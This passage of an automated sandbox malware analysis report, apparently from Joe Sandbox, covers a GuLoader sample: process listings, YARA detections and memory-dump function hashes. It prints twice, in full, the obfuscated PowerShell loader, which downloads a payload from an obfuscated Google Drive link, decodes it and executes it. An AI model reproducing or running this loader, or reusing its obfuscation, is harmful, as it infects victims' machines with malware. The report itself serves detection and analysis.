Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology ($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris ' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology (Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129) {Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris 'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$ MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology (Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco ');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow )B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:51:57
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:52:16
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology ($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris ' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology (Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129) {Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris 'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$ MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology (Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco ');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow )B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;"
Imagebase:	0xba0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2472491841.00000000081C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2472762628.0000000009395000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2457764685.00000000053B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:52:16
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:52:37
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\msiexec.exe"
Imagebase:	0x10000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:52:55
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 2284
Imagebase:	0x1c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FF848D5C6B6 Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282145412.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d727ce6b985c3ff500cdcdc04903ef1f5a824b80131af39528e15b04c025010d
Instruction ID: 6ab047f47d94f222c44167e895e0d595bbabf132a07fb23214b64946820543cc
Opcode Fuzzy Hash: d727ce6b985c3ff500cdcdc04903ef1f5a824b80131af39528e15b04c025010d
Instruction Fuzzy Hash: BEF1B53090EA8D8FEBA8EF28C8557E97BD1FF54351F04426EE84DC7291DB3899448B81

Function 00007FF848D5D462 Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282145412.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324acbd7c8d6c8d11d328a525e662b52b8b7c7c7b150ffa4bc57b7aa0527d8d
Instruction ID: bc54c59e74c2870918bee12863d04a41208906af9a299dae6bc8bb49569251bd
Opcode Fuzzy Hash: c324acbd7c8d6c8d11d328a525e662b52b8b7c7c7b150ffa4bc57b7aa0527d8d
Instruction Fuzzy Hash: 7EF1E53090EA8D8FEB68EF28C8557E97BD1EB55350F04427AE84EC7291CF7898458B91

Function 00007FF848D5FBC0 Relevance: .7, Instructions: 688COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282145412.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e92bada6c8313fae0b24c8358b2a7382b24693792fee1f580db0c86106306bb
Instruction ID: eea50d9bc85d37d134d130d5583a310e2f197bf4929a3b04b627d3649425eaad
Opcode Fuzzy Hash: 7e92bada6c8313fae0b24c8358b2a7382b24693792fee1f580db0c86106306bb
Instruction Fuzzy Hash: 5AE14E30A19A4D8FDF88EF5CC495AA9B7E1FFA8340F14416AE40DD7295CB34E885CB85

Function 00007FF848D55415 Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282145412.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49fad1f372e74ca9ca34a71ef1037b96b0dad501f3824aef7963b77d408d8f34
Instruction ID: cda7f9dd89098107e66283ff60e681736cf6cd246afca911eac8f372432bbc2c
Opcode Fuzzy Hash: 49fad1f372e74ca9ca34a71ef1037b96b0dad501f3824aef7963b77d408d8f34
Instruction Fuzzy Hash: 96F1C330A1DA4D8FDB89EF1CC455AA9BBF1FF69350F14416AD409C7296CB34E885CB81

Function 00007FF848E24689 Relevance: .5, Instructions: 502COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282665091.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848e20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5234529e7a2c86e6edb9852e3f7d44e69c5be16c05be7214cb681fb1d2dba2a4
Instruction ID: a250f24b4558fc6c49e5bf366769781b46cbd2a97125e4d763a11e084bfe6d79
Opcode Fuzzy Hash: 5234529e7a2c86e6edb9852e3f7d44e69c5be16c05be7214cb681fb1d2dba2a4
Instruction Fuzzy Hash: 12E11521E1EBC64FE35AA72858256747BE1FF56298F0801FBD44DC71E3DE28AC05835A

Function 00007FF848E2713A Relevance: .5, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282665091.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848e20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c89138abbac2f14ef83ac22bb6974c1e07919bf9369e8769c47462864539067c
Instruction ID: 7971607084961fa041e4342d989a70a1b3f57394989a462c626277ab29359e31
Opcode Fuzzy Hash: c89138abbac2f14ef83ac22bb6974c1e07919bf9369e8769c47462864539067c
Instruction Fuzzy Hash: 09D13532E1EA8A5FE769EB285C155B97BE0FF56390F0801FAD44DC71D3DB28A8018395

Function 00007FF848D5D076 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282145412.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2673fef23a115b5e32586852e0dc8b9407c2b4a5d94588299a829f8aea07f63e
Instruction ID: c0a85ce64b16bffcc594380df763bc5e920be5ff466155ae82b594761022116b
Opcode Fuzzy Hash: 2673fef23a115b5e32586852e0dc8b9407c2b4a5d94588299a829f8aea07f63e
Instruction Fuzzy Hash: 2FB1063050DA4D8FEB68EF2888557E97BE1FF55340F04427AE84EC7292CB3899458B96

Function 00007FF848E2717D Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282665091.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848e20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ee2e16c8446adee875ddb98ecaa9db2193de4258c3d370c590f04042f87615
Instruction ID: efe762a9c5f3330b8966a9eb2fe7194bfe58c49412f05542855b660015e01b45
Opcode Fuzzy Hash: 21ee2e16c8446adee875ddb98ecaa9db2193de4258c3d370c590f04042f87615
Instruction Fuzzy Hash: CD81E032E1EA868FE7A9EA285C515787AE1FF15780F1800FAD44DCB1D3DB38AC058756

Function 00007FF848FD0296 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2285740468.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01664f4b6916830c3c2b7eb4ab2e255a91e0b80505395b666fbdd5c3e61ff3a4
Instruction ID: 89ac23c33d78f3446d5ea7a5c2e7cf4f3e904a4af6cd400f5e321b327eaa5188
Opcode Fuzzy Hash: 01664f4b6916830c3c2b7eb4ab2e255a91e0b80505395b666fbdd5c3e61ff3a4
Instruction Fuzzy Hash: 9351E332D0EA854FE755BB2868551B8BBE1FF95750F0801FEC44D871D3CE28AC498B56

Function 00007FF848E24814 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282665091.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848e20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: def5a85667bc1cce98dc9fa65fdbec8105597d3cd7e0c5749d62fb66f46e6258
Instruction ID: 298485ecfb9874f301bc0c1c973b06852ebb9a791203a961ddfcaefc54af190a
Opcode Fuzzy Hash: def5a85667bc1cce98dc9fa65fdbec8105597d3cd7e0c5749d62fb66f46e6258
Instruction Fuzzy Hash: 2821E121E2EACA5FF3ADB628545527466D2FF852A8F5801BAE00DC71D3EF29AC054319

Function 00007FF848D5CB74 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282145412.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18d3876c1ca63d3e26a223b706693560ea9c2d053976f0a53cc426e5113f96d
Instruction ID: d1942853a859c9726e28564b713130874251a0fbac7782adedac0cb34ab0f028
Opcode Fuzzy Hash: b18d3876c1ca63d3e26a223b706693560ea9c2d053976f0a53cc426e5113f96d
Instruction Fuzzy Hash: 2B31DA3081E64E9EFBB8BF18CC69BF972D0FF41359F40413AD44D86092CB796A89CA15

Function 00007FF848E219AF Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282665091.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848e20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bcadb221a39e6ec2617956503adf9b83c63230e33d74055ed6d4a6ead86df40
Instruction ID: 9d9c747e5d82bd00bb6616e4167424edfd6d078eadce340ec155a5ac3848e4b4
Opcode Fuzzy Hash: 4bcadb221a39e6ec2617956503adf9b83c63230e33d74055ed6d4a6ead86df40
Instruction Fuzzy Hash: D2210412E0FAC65FE366AA7C28151746ED0FF566E0B0805FBD088C71D3DD28AC498366

Function 00007FF848D541E5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2282145412.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
Instruction ID: a7b1f54f7e3ad0684cb7e59c5c03e8b3b043b25e4c542a1ad1097e33e24623ef
Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
Instruction Fuzzy Hash: E401447115CB084FD748EF0CE451AB5B7E0FB95364F10056EE58AC3655D726E882CB46

Analysis Process: powershell.exePID: 6592, Parent PID: 1028COMMON

Executed Functions

Function 00B8F0C0 Relevance: 2.8, Strings: 2, Instructions: 281COMMON

Download Yara Rule

Strings

fP.Q, xrefs: 00B8F0DF
fP.Q, xrefs: 00B8F0FF

Memory Dump Source

Source File: 00000005.00000002.2430172735.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b80000_powershell.jbxd

Similarity

API ID:
String ID: fP.Q$fP.Q
API String ID: 0-2514346288
Opcode ID: 21fa8324cb85b53c3be986fd37cd7edf58b80cc644b0119f2a3ffa67ce1a21bb
Instruction ID: 6d3d14de5e79eee73e613de38c1756d8610f7f6a1cf160010e066dc7f53cdd87
Opcode Fuzzy Hash: 21fa8324cb85b53c3be986fd37cd7edf58b80cc644b0119f2a3ffa67ce1a21bb
Instruction Fuzzy Hash: 18B15270E0020ACFDF14EFA9C9857ADBBF2EF88714F148179E815A7264EB749845CB85

Function 00B8F990 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

fP.Q, xrefs: 00B8F9AF
fP.Q, xrefs: 00B8F9CF

Memory Dump Source

